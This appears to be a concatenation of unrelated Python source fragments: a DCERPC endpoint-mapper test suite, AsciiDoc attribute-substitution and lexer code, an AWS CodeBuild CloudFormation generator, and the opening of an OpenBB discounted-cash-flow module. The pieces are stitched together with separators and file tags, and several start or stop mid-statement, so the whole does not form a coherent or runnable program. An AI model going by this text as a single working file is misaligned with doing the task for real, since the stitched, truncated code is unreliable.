dce = self.connectDCE('', '', '', auth_level=RPC_C_AUTHN_LEVEL_PKT_PRIVACY,dceAuth=False, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
except Exception, e:
if not (str(e).find('STATUS_ACCESS_DENIED') >=0 and self.stringBinding.find('ncacn_np') >=0):
raise
class TCPTransport(DCERPCTests):
def setUp(self):
DCERPCTests.setUp(self)
# Put specific configuration for target machine with SMB1
configFile = ConfigParser.ConfigParser()
configFile.read('dcetests.cfg')
self.username = configFile.get('TCPTransport', 'username')
self.domain = configFile.get('TCPTransport', 'domain')
self.serverName = configFile.get('TCPTransport', 'servername')
self.password = configFile.get('TCPTransport', 'password')
self.machine = configFile.get('TCPTransport', 'machine')
self.hashes = configFile.get('TCPTransport', 'hashes')
self.aesKey256= configFile.get('TCPTransport', 'aesKey256')
self.aesKey128= configFile.get('TCPTransport', 'aesKey128')
self.stringBinding = r'ncacn_ip_tcp:%s' % self.machine
class SMBTransport(DCERPCTests):
def setUp(self):
# Put specific configuration for target machine with SMB_002
DCERPCTests.setUp(self)
configFile = ConfigParser.ConfigParser()
configFile.read('dcetests.cfg')
self.username = configFile.get('SMBTransport', 'username')
self.domain = configFile.get('SMBTransport', 'domain')
self.serverName = configFile.get('SMBTransport', 'servername')
self.password = configFile.get('SMBTransport', 'password')
self.machine = configFile.get('SMBTransport', 'machine')
self.hashes = configFile.get('SMBTransport', 'hashes')
self.aesKey256= configFile.get('SMBTransport', 'aesKey256')
self.aesKey128= configFile.get('SMBTransport', 'aesKey128')
self.stringBinding = r'ncacn_np:%s[\pipe\epmapper]' % self.machine
if __name__ == "__main__":
import sys
if len(sys.argv) > 1:
testcase = sys.argv[1]
suite = unittest.TestLoader().loadTestsFromTestCase(globals()[testcase])
| |
None:
attrs = document.attributes
else:
# Remove numbered document attributes so they don't clash with
# attribute list positional attributes.
attrs = {}
for k,v in document.attributes.items():
if not re.match(r'^\d+$', k):
attrs[k] = v
# Substitute attribute references inside dictionary values.
for k,v in dictionary.items():
if v is None:
del dictionary[k]
else:
v = subs_attrs(str(v))
if v is None:
del dictionary[k]
else:
dictionary[k] = v
attrs.update(dictionary)
# Substitute all attributes in all lines.
result = []
for line in lines:
# Make it easier for regular expressions.
line = line.replace('\\{','{\\')
line = line.replace('\\}','}\\')
# Expand simple attributes ({name}).
# Nested attributes not allowed.
reo = re.compile(r'(?su)\{(?P<name>[^\\\W][-\w]*?)\}(?!\\)')
pos = 0
while True:
mo = reo.search(line,pos)
if not mo: break
s = attrs.get(mo.group('name'))
if s is None:
pos = mo.end()
else:
s = str(s)
line = line[:mo.start()] + s + line[mo.end():]
pos = mo.start() + len(s)
# Expand conditional attributes.
# Single name -- higher precedence.
reo1 = re.compile(r'(?su)\{(?P<name>[^\\\W][-\w]*?)' \
r'(?P<op>\=|\?|!|#|%|@|\$)' \
r'(?P<value>.*?)\}(?!\\)')
# Multiple names (n1,n2,... or n1+n2+...) -- lower precedence.
reo2 = re.compile(r'(?su)\{(?P<name>[^\\\W][-\w'+OR+AND+r']*?)' \
r'(?P<op>\=|\?|!|#|%|@|\$)' \
r'(?P<value>.*?)\}(?!\\)')
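        # Grounded in the operator handling below: {a=x} expands to the
        # value of 'a' when defined and to "x" otherwise; {a?x} expands to
        # "x" only when 'a' is defined; {a!x} to "x" only when 'a' is
        # undefined; {a#x} to "x" when defined, dropping the whole line
        # otherwise.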
for reo in [reo1,reo2]:
pos = 0
while True:
mo = reo.search(line,pos)
if not mo: break
attr = mo.group()
name = mo.group('name')
if reo == reo2:
if OR in name:
sep = OR
else:
sep = AND
names = [s.strip() for s in name.split(sep) if s.strip() ]
for n in names:
if not re.match(r'^[^\\\W][-\w]*$',n):
message.error('illegal attribute syntax: %s' % attr)
if sep == OR:
# Process OR name expression: n1,n2,...
for n in names:
if attrs.get(n) is not None:
lval = ''
break
else:
lval = None
else:
# Process AND name expression: n1+n2+...
for n in names:
if attrs.get(n) is None:
lval = None
break
else:
lval = ''
else:
lval = attrs.get(name)
op = mo.group('op')
# mo.end() not good enough because '{x={y}}' matches '{x={y}'.
end = end_brace(line,mo.start())
rval = line[mo.start('value'):end-1]
UNDEFINED = '{zzzzz}'
if lval is None:
if op == '=': s = rval
elif op == '?': s = ''
elif op == '!': s = rval
elif op == '#': s = UNDEFINED # So the line is dropped.
elif op == '%': s = rval
elif op in ('@','$'):
s = UNDEFINED # So the line is dropped.
else:
assert False, 'illegal attribute: %s' % attr
else:
if op == '=': s = lval
elif op == '?': s = rval
elif op == '!': s = ''
elif op == '#': s = rval
elif op == '%': s = UNDEFINED # So the line is dropped.
elif op in ('@','$'):
v = re.split(r'(?<!\\):',rval)
if len(v) not in (2,3):
message.error('illegal attribute syntax: %s' % attr)
s = ''
elif not is_re('^'+v[0]+'$'):
message.error('illegal attribute regexp: %s' % attr)
s = ''
else:
v = [s.replace('\\:',':') for s in v]
re_mo = re.match('^'+v[0]+'$',lval)
if op == '@':
if re_mo:
s = v[1] # {<name>@<re>:<v1>[:<v2>]}
else:
if len(v) == 3: # {<name>@<re>:<v1>:<v2>}
s = v[2]
else: # {<name>@<re>:<v1>}
s = ''
else:
if re_mo:
if len(v) == 2: # {<name>$<re>:<v1>}
s = v[1]
elif v[1] == '': # {<name>$<re>::<v2>}
s = UNDEFINED # So the line is dropped.
else: # {<name>$<re>:<v1>:<v2>}
s = v[1]
else:
if len(v) == 2: # {<name>$<re>:<v1>}
s = UNDEFINED # So the line is dropped.
else: # {<name>$<re>:<v1>:<v2>}
s = v[2]
else:
assert False, 'illegal attribute: %s' % attr
s = str(s)
line = line[:mo.start()] + s + line[end:]
pos = mo.start() + len(s)
# Drop line if it contains unsubstituted {name} references.
skipped = re.search(r'(?su)\{[^\\\W][-\w]*?\}(?!\\)', line)
if skipped:
trace('dropped line', line)
            continue
# Expand system attributes (eval has precedence).
reos = [
re.compile(r'(?su)\{(?P<action>eval):(?P<expr>.*?)\}(?!\\)'),
re.compile(r'(?su)\{(?P<action>[^\\\W][-\w]*?):(?P<expr>.*?)\}(?!\\)'),
]
skipped = False
for reo in reos:
pos = 0
while True:
mo = reo.search(line,pos)
if not mo: break
expr = mo.group('expr')
action = mo.group('action')
expr = expr.replace('{\\','{')
expr = expr.replace('}\\','}')
s = system(action, expr, attrs=dictionary)
if dictionary is not None and action in ('counter','counter2','set','set2'):
# These actions create and update attributes.
attrs.update(dictionary)
if s is None:
# Drop line if the action returns None.
skipped = True
break
line = line[:mo.start()] + s + line[mo.end():]
pos = mo.start() + len(s)
if skipped:
break
if not skipped:
# Remove backslash from escaped entries.
line = line.replace('{\\','{')
line = line.replace('}\\','}')
result.append(line)
if string_result:
if result:
return '\n'.join(result)
else:
return None
else:
return tuple(result)
def char_encoding():
encoding = document.attributes.get('encoding')
if encoding:
try:
codecs.lookup(encoding)
except LookupError,e:
raise EAsciiDoc,str(e)
return encoding
def char_len(s):
return len(char_decode(s))
east_asian_widths = {'W': 2, # Wide
'F': 2, # Full-width (wide)
'Na': 1, # Narrow
'H': 1, # Half-width (narrow)
'N': 1, # Neutral (not East Asian, treated as narrow)
'A': 1} # Ambiguous (s/b wide in East Asian context,
# narrow otherwise, but that doesn't work)
"""Mapping of result codes from `unicodedata.east_asian_width()` to character
column widths."""
def column_width(s):
text = char_decode(s)
if isinstance(text, unicode):
width = 0
for c in text:
width += east_asian_widths[unicodedata.east_asian_width(c)]
return width
else:
return len(text)
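# For example (assuming the document encoding is set so char_decode()
# returns a unicode string): a CJK ideograph such as u'\u4e00' has East
# Asian width class 'W' and counts as 2 columns, while plain ASCII
# characters count as 1.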
def char_decode(s):
if char_encoding():
try:
return s.decode(char_encoding())
except Exception:
raise EAsciiDoc, \
"'%s' codec can't decode \"%s\"" % (char_encoding(), s)
else:
return s
def char_encode(s):
if char_encoding():
return s.encode(char_encoding())
else:
return s
def time_str(t):
"""Convert seconds since the Epoch to formatted local time string."""
t = time.localtime(t)
s = time.strftime('%H:%M:%S',t)
if time.daylight and t.tm_isdst == 1:
result = s + ' ' + time.tzname[1]
else:
result = s + ' ' + time.tzname[0]
# Attempt to convert the localtime to the output encoding.
try:
result = char_encode(result.decode(locale.getdefaultlocale()[1]))
except Exception:
pass
return result
def date_str(t):
"""Convert seconds since the Epoch to formatted local date string."""
t = time.localtime(t)
return time.strftime('%Y-%m-%d',t)
class Lex:
"""Lexical analysis routines. Static methods and attributes only."""
prev_element = None
prev_cursor = None
def __init__(self):
raise AssertionError,'no class instances allowed'
@staticmethod
def next():
"""Returns class of next element on the input (None if EOF). The
reader is assumed to be at the first line following a previous element,
end of file or line one. Exits with the reader pointing to the first
line of the next element or EOF (leading blank lines are skipped)."""
reader.skip_blank_lines()
if reader.eof(): return None
# Optimization: If we've already checked for an element at this
# position return the element.
if Lex.prev_element and Lex.prev_cursor == reader.cursor:
return Lex.prev_element
if AttributeEntry.isnext():
result = AttributeEntry
elif AttributeList.isnext():
result = AttributeList
elif BlockTitle.isnext() and not tables_OLD.isnext():
result = BlockTitle
elif Title.isnext():
if AttributeList.style() == 'float':
result = FloatingTitle
else:
result = Title
elif macros.isnext():
result = macros.current
elif lists.isnext():
result = lists.current
elif blocks.isnext():
result = blocks.current
elif tables_OLD.isnext():
result = tables_OLD.current
elif tables.isnext():
result = tables.current
else:
if not paragraphs.isnext():
raise EAsciiDoc,'paragraph expected'
result = paragraphs.current
# Optimization: Cache answer.
Lex.prev_cursor = reader.cursor
Lex.prev_element = result
return result
@staticmethod
def canonical_subs(options):
"""Translate composite subs values."""
if len(options) == 1:
if options[0] == 'none':
options = ()
elif options[0] == 'normal':
options = config.subsnormal
elif options[0] == 'verbatim':
options = config.subsverbatim
return options
@staticmethod
def subs_1(s,options):
"""Perform substitution specified in 'options' (in 'options' order)."""
if not s:
return s
if document.attributes.get('plaintext') is not None:
options = ('specialcharacters',)
result = s
options = Lex.canonical_subs(options)
for o in options:
if o == 'specialcharacters':
result = config.subs_specialchars(result)
elif o == 'attributes':
result = subs_attrs(result)
elif o == 'quotes':
result = subs_quotes(result)
elif o == 'specialwords':
result = config.subs_specialwords(result)
elif o in ('replacements','replacements2','replacements3'):
result = config.subs_replacements(result,o)
elif o == 'macros':
result = macros.subs(result)
elif o == 'callouts':
result = macros.subs(result,callouts=True)
else:
raise EAsciiDoc,'illegal substitution option: %s' % o
trace(o, s, result)
if not result:
break
return result
@staticmethod
def subs(lines,options):
"""Perform inline processing specified by 'options' (in 'options'
order) on sequence of 'lines'."""
if not lines or not options:
return lines
options = Lex.canonical_subs(options)
# Join lines so quoting can span multiple lines.
para = '\n'.join(lines)
if 'macros' in options:
para = macros.extract_passthroughs(para)
for o in options:
if o | |
<filename>codebuild/create_project.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
copywrite = """# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use
# this file except in compliance with the License. A copy of the License is
# located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing permissions and
# limitations under the License.
"""
import argparse
import boto3
import configparser
import hashlib
import json
import logging
import os
import sys
import time
from awacs.aws import Action, Allow, Statement, Principal, PolicyDocument
from awacs.sts import AssumeRole
from botocore import exceptions
from troposphere import GetAtt, Template, Ref, Output
from troposphere.events import Rule, Target
from troposphere.iam import Role, Policy
from troposphere.codebuild import Artifacts, Environment, Source, Project
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def build_cw_event(template=Template(), project_name=None, role=None, target_job=None, hour=12, input_json=None):
""" Create a CloudWatch Event to run a CodeBuild Project. """
    # CloudFormation logical resource names must be alphanumeric (no underscores)
project_name = project_name.replace('_', '')
# target_job is only expected in the case where multiple events are pointed at the same target.
# Use the project name as the dependency otherwise.
if not target_job:
target_job = project_name
# input_json is used to pass additional ENV variables to the codebuild job.
if input_json:
project_target = Target(
f"{project_name}Target",
Arn=GetAtt(target_job, "Arn"),
RoleArn=GetAtt(role, "Arn"),
Input=json.dumps(input_json),
Id=f"{project_name}CWid"
)
else:
project_target = Target(
f"{project_name}Target",
Arn=GetAtt(target_job, "Arn"),
RoleArn=GetAtt(role, "Arn"),
Id=f"{project_name}CWid"
)
Rule(f"{project_name}Rule",
template=template,
         Name=f"{project_name}Event",
         Description="Scheduled CodeBuild run, managed by CloudFormation",
Targets=[project_target],
State='ENABLED',
# Run at the top of hour.
ScheduleExpression=f"cron(0 {hour} * * ? *)",
DependsOn=target_job
)
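# For example, hour=12 yields ScheduleExpression "cron(0 12 * * ? *)", which
# CloudWatch evaluates in UTC as 12:00 every day (the "?" leaves the
# day-of-week field unconstrained).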
def build_cw_cb_role(template, config, role_name="s2nEventsInvokeCodeBuildRole"):
"""
Create a role for CloudWatch events to trigger scheduled CodeBuild jobs.
"""
role_id = template.add_resource(
Role(
role_name,
Path='/',
AssumeRolePolicyDocument=PolicyDocument(
Statement=[
Statement(
Effect=Allow,
Action=[Action("sts", "AssumeRole"),
],
Principal=Principal("Service", ["events.amazonaws.com"])
)
]
),
Policies=[Policy(
            PolicyName="EventsInvokeCBRole",
PolicyDocument=PolicyDocument(
Statement=[
Statement(
Effect=Allow,
Action=[Action("codebuild", "StartBuild")],
Resource=[
"arn:aws:codebuild:{region}:{account_number}:project/*".format(
region=config.get('Global', 'aws_region'),
account_number=config.get('CFNRole', 'account_number')),
]
)
]
)
)
]
)
)
return role_id
def build_github_role(template, config, role_name="s2nCodeBuildGithubRole"):
"""
Create a role for GitHub actions to use for launching CodeBuild jobs.
This is not attached to any other resource created in this file.
"""
template.add_resource(
Role(
role_name,
Path='/',
AssumeRolePolicyDocument=PolicyDocument(
Statement=[
Statement(
Effect=Allow,
Principal=Principal("Service", ["codebuild.amazonaws.com"]),
Action=[Action("sts", "AssumeRole")],
)
]
),
)
)
def build_artifacts(identifier: str, s3_bucketname: str) -> Artifacts:
""" CodeBuild Artifact and Secondary Artifact creation. """
artifact = Artifacts(
Name=f"{identifier}Artifact",
ArtifactIdentifier=identifier,
EncryptionDisabled=True,
Location=s3_bucketname,
NamespaceType='NONE', # NOTE: case sensitive
OverrideArtifactName=False,
Packaging='ZIP', # NOTE: case sensitive
Type='S3') # NOTE: case sensitive
return artifact
def build_project(template=Template(), section=None, project_name=None, raw_env=None,
service_role: str = None) -> Template:
""" Assemble all the requirements for a Troposphere CodeBuild Project. """
template.set_version('2010-09-09')
secondary_artifacts = list()
# Artifact object creation
if 'artifact_s3_bucket' in config[section]:
artifacts = build_artifacts(project_name,
config.get(section, 'artifact_s3_bucket'))
if 'artifact_secondary_identifiers' in config[section]:
# There can be N number of secondary artifacts
for arti in config.get(section, 'artifact_secondary_identifiers').split(','):
secondary_artifacts.append(build_artifacts(arti, config.get(section, 'artifact_s3_bucket')))
else:
# One blank Artifact object required.
artifacts = Artifacts(Type='NO_ARTIFACTS')
env_list = list()
# Convert the env: line in the config to a list.
try:
logging.debug(f'raw_env is {raw_env}')
env = raw_env.split(' ')
except AttributeError:
env = config.get(section, 'env').split(' ')
logging.debug(f'Section is {section}')
# Split the env key/value pairs into dict.
for i in env:
        k, v = i.split("=", 1)
env_list.append({"Name": k, "Value": v})
environment = Environment(
ComputeType=config.get(section, 'compute_type'),
Image=str(config.get(section, 'image')),
Type=str(config.get(section, 'env_type')),
PrivilegedMode=True,
EnvironmentVariables=env_list,
)
source = Source(
Location=config.get(section, 'source_location'),
Type=config.get(section, 'source_type'),
GitCloneDepth=config.get(section, 'source_clonedepth'),
BuildSpec=config.get(section, 'buildspec'),
ReportBuildStatus=True
)
# Artifact is required; SecondaryArtifact is optional.
if secondary_artifacts:
project = Project(
project_name,
Artifacts=artifacts,
SecondaryArtifacts=secondary_artifacts,
Environment=environment,
Name=project_name,
TimeoutInMinutes=config.get(section, 'timeout_in_min'),
ServiceRole=Ref(service_role),
Source=source,
SourceVersion=config.get(section, 'source_version'),
BadgeEnabled=True,
DependsOn=service_role,
)
else:
project = Project(
project_name,
Artifacts=artifacts,
Environment=environment,
Name=project_name,
TimeoutInMinutes=config.get(section, 'timeout_in_min'),
ServiceRole=Ref(service_role),
Source=source,
SourceVersion=config.get(section, 'source_version'),
BadgeEnabled=True,
DependsOn=service_role,
)
template.add_resource(project)
    template.add_output([Output(f"CodeBuildProject{project_name}", Value=Ref(project))])
    return template
def build_codebuild_role(config, template=Template(), project_name: str = None, **kwargs) -> Ref:
""" Build a role with a CodeBuild managed policy. """
assert project_name
role_name = project_name + 'Role'
region = config.get("Global", "aws_region")
account_number = config.get("CFNRole", "account_number")
# Create a policy to Allow CodeBuild to write to s3 for Artifact storage/retrieval.
# This should be an AWS Managed Policy, but here we are.
policies = [Policy(
        PolicyName="CodeBuildArtifactPolicy",
PolicyDocument=PolicyDocument(
Statement=[
Statement(
Effect=Allow,
Action=[Action("s3", "PutObject"),
Action("s3", "GetObject"),
Action("s3", "GetObjectVersion"),
Action("s3", "GetBucketAcl"),
Action("s3", "GetBucketLocation")],
Resource=[
"arn:aws:s3:::s2n-build-artifacts/*",
]
),
Statement(
Effect=Allow,
Action=[Action("logs", "CreateLogGroup"),
Action("logs", "CreateLogStream"),
Action("logs", "PutLogEvents")],
Resource=[
"arn:aws:logs:{region}:{account_number}:log-group:/aws/codebuild/{project}:*".format(
region=region, account_number=account_number, project=project_name),
]
),
Statement(
Effect=Allow,
Action=[
Action("codecommit", "BatchGet*"),
Action("codecommit", "BatchDescribe*"),
Action("codecommit", "Describe*"),
Action("codecommit", "EvaluatePullRequestApprovalRules"),
Action("codecommit", "Get*"),
Action("codecommit", "List*"),
Action("codecommit", "GitPull"),
],
Resource=["*"],
),
]
)
)]
    # NOTE: By default CodeBuild manages the policies for this role. If you delete a CFN stack and then recreate or
    # modify the project while the CodeBuild-managed policy still exists, the console shows the error
    # `The policy is attached to 0 entities but it must be attached to a single role` and the CloudFormation update
    # fails. Orphaned policies created by CodeBuild have CodeBuildBasePolicy prepended to their names; find policies
    # with that prefix and no attached role, and delete them to clear the error.
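    # A possible cleanup sketch (illustrative only, not part of this script):
    #   iam = boto3.client('iam')
    #   for page in iam.get_paginator('list_policies').paginate(Scope='Local'):
    #       for p in page['Policies']:
    #           if p['PolicyName'].startswith('CodeBuildBasePolicy') and p['AttachmentCount'] == 0:
    #               iam.delete_policy(PolicyArn=p['Arn'])  # non-default versions must be deleted first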
role_id = template.add_resource(
Role(
role_name,
Path='/',
Description='Policy created by CloudFormation.',
Policies=policies,
AssumeRolePolicyDocument=PolicyDocument(
Statement=[
Statement(
Effect=Allow,
Action=[AssumeRole],
Principal=Principal("Service", ["codebuild.amazonaws.com"])
)
]
)
)
)
template.add_output([Output(role_name, Value=Ref(role_id))])
return Ref(role_id)
def display_change_set(description):
"""Not the greatest display, but this doesn't require any additional dependencies."""
for change in description['Changes']:
items = []
for k, v in change['ResourceChange'].items():
            if isinstance(v, list):
v = str(v)
q = f"\n\t{k:<20} {v:>10}"
items.append(q)
logging.info("Summary of changes: {}".format("".join(items)))
def modify_existing_stack(client, config, codebuild):
"""Modify and exist Codebuild project's CloudFormation stack"""
stack_name = config.get("Global", "stack_name")
    # ChangeSetNames must start with an alphabetic character and be unique.
    # Prefixing the hashed timestamp with an 'A' satisfies both requirements.
    change_set_name = "A" + hashlib.sha256(time.asctime().encode('utf-8')).hexdigest()
client.create_change_set(
StackName=stack_name,
TemplateBody=codebuild.to_yaml(),
Capabilities=["CAPABILITY_IAM"],
ChangeSetName=change_set_name)
logging.info(f"Waiting for change set {change_set_name}")
waiter = client.get_waiter('change_set_create_complete')
    waiter.wait(StackName=stack_name, ChangeSetName=change_set_name, WaiterConfig={"Delay": 3, "MaxAttempts": 3})
description = client.describe_change_set(StackName=stack_name, ChangeSetName=change_set_name)
display_change_set(description)
    key = input('\nDo these changes make sense? [y/N]')
    if key.strip().lower() != "y":
logging.info("Exiting without executing change set")
client.delete_change_set(StackName=stack_name, ChangeSetName=change_set_name)
return
logging.info(f"Executing {change_set_name}")
exc = client.execute_change_set(
StackName=stack_name,
ChangeSetName=change_set_name)
waiter = client.get_waiter('stack_update_complete')
    waiter.wait(StackName=stack_name, WaiterConfig={"Delay": 5, "MaxAttempts": 6})
logging.info(f"Update completed: {exc}")
def create_new_stack(client, config, codebuild):
"""Create a new CloudFormation stack for the Codebuild project"""
try:
result = client.create_stack(
StackName=config.get("Global", "stack_name"),
TemplateBody=codebuild.to_yaml(),
Capabilities=["CAPABILITY_IAM"])
logging.info("Creating stack {}".format(result['StackId']))
    except client.exceptions.AlreadyExistsException:
logging.error("Stack already exists, you must use the --modify-existing flag to update a stack")
def validate_cfn(boto_client: boto3.client, cfn_template: str):
""" Call validate_template with boto. """
try:
response = boto_client.validate_template(TemplateBody=cfn_template)
logging.debug(f"CloudFormation Template validation response: {response}")
logging.info('CloudFormation template validation complete.')
except exceptions.ClientError as e:
raise SystemExit(f"Failed: {e}")
def main(args, config):
""" Create the CFN template and do stuff with said template. """
codebuild = Template()
codebuild.set_version('2010-09-09')
# Create a single CloudWatch Event role to allow codebuild:startBuild
cw_event_role = build_cw_cb_role(codebuild, config)
temp_yaml_filename = args.output_dir + "/s2n_codebuild_projects.yml"
# Role used by GitHub Actions.
if config.has_option('Global', 'create_github_role') and config.getboolean('Global', 'create_github_role'):
build_github_role(codebuild, config)
# Walk the config file, adding each stanza to the Troposphere template.
for job in config.sections():
if ':' in job:
job_title = job.split(':')[1]
if 'CodeBuild:' in job:
            service_role = build_codebuild_role(config, template=codebuild, project_name=job_title).to_dict()
# Pull the env out of the section, and use the snippet for the other values.
            # Note: only env is overridden with snippets.
if 'snippet' in config[job]:
build_project(template=codebuild, project_name=job_title, section=config.get(job, 'snippet'),
service_role=service_role['Ref'], raw_env=config.get(job, 'env'))
else:
build_project(template=codebuild, project_name=job_title, section=job, service_role=service_role['Ref'])
# Scheduled runs triggered by CloudWatch.
build_cw_event(template=codebuild, project_name=job_title, role=cw_event_role)
if 'CloudWatchEvent' in job:
            # CloudWatch input allows us to override environment variables passed to CodeBuild.
cw_input = json.loads(config.get(job, 'input'))
            # Note that for CloudWatch, we need to reference an existing CodeBuild job.
build_cw_event(template=codebuild, project_name=job_title, target_job=config.get(job, 'build_job_name'),
role=cw_event_role,
hour=config.get(job, 'start_time'), input_json=cw_input)
# Write out a CloudFormation template. This is ephemeral and is not used again.
with(open(temp_yaml_filename, 'w')) as fh:
fh.write(codebuild.to_yaml())
logging.info(f"Wrote cfn yaml file to {temp_yaml_filename}")
if args.noop:
logging.info("Respecting noop, Done.")
return
else:
# Fire up the boto, exit gracefully if the user doesn't have creds setup.
client = boto3.client('cloudformation', region_name=config.get('Global', 'aws_region'))
try:
validate_cfn(client, codebuild.to_yaml())
except exceptions.NoCredentialsError:
raise SystemExit(f"Something went wrong with your AWS credentials; Exiting.")
<reponame>JerBouma/OpenBBTerminal
""" DCF Model """
__docformat__ = "numpy"
import logging
import os
from io import BytesIO
from pathlib import Path
from typing import Any, Dict, List, Tuple, Union
from urllib.request import urlopen
from zipfile import ZipFile
import financedatabase as fd
import pandas as pd
import requests
import yfinance as yf
from bs4 import BeautifulSoup
from openpyxl import worksheet
from sklearn.linear_model import LinearRegression
from openbb_terminal.decorators import log_start_end
from openbb_terminal.stocks.fundamental_analysis import dcf_static
from openbb_terminal.helper_funcs import compose_export_path
logger = logging.getLogger(__name__)
CURRENCIES = [
"ALL",
"AFN",
"ARS",
"AWG",
"AUD",
"AZN",
"BSD",
"BBD",
"BYN",
"BZD",
"BMD",
"BOB",
"BAM",
"BWP",
"BGN",
"BRL",
"BND",
"KHR",
"CAD",
"KYD",
"CLP",
"CNY",
"COP",
"CRC",
"HRK",
"CUP",
"CZK",
"DKK",
"DOP",
"XCD",
"EGP",
"SVC",
"EUR",
"FKP",
"FJD",
"GHS",
"GIP",
"GTQ",
"GGP",
"GYD",
"HNL",
"HKD",
"HUF",
"ISK",
"INR",
"IDR",
"IRR",
"IMP",
"ILS",
"JMD",
"JPY",
"JEP",
"KZT",
"KPW",
"KRW",
"KGS",
"LAK",
"LBP",
"LRD",
"MKD",
"MYR",
"MUR",
"MXN",
"MNT",
"MNT",
"MZN",
"NAD",
"NPR",
"ANG",
"NZD",
"NIO",
"NGN",
"NOK",
"OMR",
"PKR",
"PAB",
"PYG",
"PEN",
"PHP",
"PLN",
"QAR",
"RON",
"RUB",
"SHP",
"SAR",
"RSD",
"SCR",
"SGD",
"SBD",
"SOS",
"KRW",
"ZAR",
"LKR",
"SEK",
"CHF",
"SRD",
"SYP",
"TWD",
"THB",
"TTD",
"TRY",
"TVD",
"UAH",
"AED",
"GBP",
"USD",
"UYU",
"UZS",
"VEF",
"VND",
"YER",
"ZWD",
]
@log_start_end(log=logger)
def string_float(string: str) -> float:
"""Convert a string to a float
Parameters
----------
string : str
String to be converted
Returns
-------
    number : float
        The string converted to a float; commas and dashes are stripped and an
        empty result maps to 0
"""
    stripped = string.strip().replace(",", "").replace("-", "")
    if stripped == "":
        return 0
    return float(stripped)
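# For example, string_float(" 1,234 ") returns 1234.0, while string_float("-")
# returns 0, since commas and dashes are stripped before conversion.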
def insert_row(
name: str, index: str, df: pd.DataFrame, row_v: List[str]
) -> pd.DataFrame:
"""Allows a row to be added given an index and name
Parameters
----------
name : str
Name to be added to df
index : str
The row the new item will go after
df : pd.DataFrame
The dataframe to be modified
row_v : List[str]
The items to be added to the row
Returns
-------
new_df : pd.DataFrame
The new dataframe
"""
pd.options.mode.chained_assignment = None
if name not in df.index:
row_number = df.index.get_loc(index) + 1
df1 = df[0:row_number]
df2 = df[row_number:]
df1.loc[name] = row_v
df_result = pd.concat([df1, df2])
return df_result
return df
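# For example, insert_row("Gross Profit", "Revenue", df, ["0", "0"]) places a
# new "Gross Profit" row directly after the "Revenue" row; if the name already
# exists, the dataframe is returned unchanged.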
@log_start_end(log=logger)
def set_cell(
ws: worksheet,
cell: str,
text: Union[int, str, float] = None,
font: str = None,
border: str = None,
fill: str = None,
alignment: str = None,
num_form: str = None,
):
"""Set the value for a cell
Parameters
----------
ws : worksheet
The worksheet to be modified
cell : str
The cell that will be modified
text : Union[int, str, float]
The new value of the cell
font : str
The type of font
border : str
The type of border
fill : str
The type of fill
alignment : str
The type of alignment
num_form : str
The format for numbers
"""
    if text is not None:
ws[cell] = text
if font:
ws[cell].font = font
if border:
ws[cell].border = border
if fill:
ws[cell].fill = fill
if alignment:
ws[cell].alignment = alignment
if num_form:
ws[cell].number_format = num_form
@log_start_end(log=logger)
def get_fama_raw() -> pd.DataFrame:
"""Get Fama French data
Returns
-------
df : pd.DataFrame
Fama French data
"""
with urlopen( # nosec
"https://mba.tuck.dartmouth.edu/pages/faculty/ken.french/ftp/F-F_Research_Data_Factors_CSV.zip"
) as url:
# Download Zipfile and create pandas DataFrame
with ZipFile(BytesIO(url.read())) as zipfile:
with zipfile.open("F-F_Research_Data_Factors.CSV") as zip_open:
df = pd.read_csv(
zip_open,
header=0,
names=["Date", "MKT-RF", "SMB", "HML", "RF"],
skiprows=3,
)
df = df[df["Date"].apply(lambda x: len(str(x).strip()) == 6)]
df["Date"] = df["Date"].astype(str) + "01"
df["Date"] = pd.to_datetime(df["Date"], format="%Y%m%d")
df["MKT-RF"] = pd.to_numeric(df["MKT-RF"], downcast="float")
df["SMB"] = pd.to_numeric(df["SMB"], downcast="float")
df["HML"] = pd.to_numeric(df["HML"], downcast="float")
df["RF"] = pd.to_numeric(df["RF"], downcast="float")
df["MKT-RF"] = df["MKT-RF"] / 100
df["SMB"] = df["SMB"] / 100
df["HML"] = df["HML"] / 100
df["RF"] = df["RF"] / 100
df = df.set_index("Date")
return df
@log_start_end(log=logger)
def get_historical_5(ticker: str) -> pd.DataFrame:
"""Get 5 year monthly historical performance for a ticker with dividends filtered
Parameters
----------
ticker : str
The ticker to be analyzed
Returns
-------
df : pd.DataFrame
Historical data
"""
tick = yf.Ticker(ticker)
df = tick.history(period="5y", interval="1mo")
df = df[df.index.to_series().apply(lambda x: x.day == 1)]
df = df.drop(["Dividends", "Stock Splits"], axis=1)
df = df.dropna()
return df
@log_start_end(log=logger)
def get_fama_coe(ticker: str) -> float:
"""Use Fama and French to get the cost of equity for a company
Parameters
----------
ticker : str
The ticker to be analyzed
Returns
-------
    coef : float
        The annualized cost of equity implied by the three-factor regression
"""
df_f = get_fama_raw()
df_h = get_historical_5(ticker)
df = df_h.join(df_f)
df = df.dropna()
df["Monthly Return"] = df["Close"].pct_change()
df["Excess Monthly Return"] = df["Monthly Return"] - df["RF"]
df = df.dropna()
x = df[["MKT-RF", "SMB", "HML"]]
y = df["Excess Monthly Return"]
model = LinearRegression().fit(x, y)
coefs = model.coef_
return (
df["RF"].mean()
+ coefs[0] * df["MKT-RF"].mean()
+ coefs[1] * df["SMB"].mean()
+ coefs[2] * df["HML"].mean()
) * 12
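# In formula form, the estimate above is the annualized three-factor model
#   CoE = 12 * (E[RF] + b_mkt * E[MKT-RF] + b_smb * E[SMB] + b_hml * E[HML])
# where the betas are the OLS coefficients from regressing excess monthly
# returns on the Fama-French factors.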
@log_start_end(log=logger)
def others_in_sector(
ticker: str, sector: str, industry: str, no_filter: bool = False
) -> List[str]:
"""Get other stocks in a ticker's sector
Parameters
----------
ticker : str
The ticker to be excluded
sector : str
The sector to pull from
industry : str
The industry to pull from
no_filter : bool
True means that we do not filter based on market cap
Returns
-------
tickers : List[str]
List of tickers in the same sector
"""
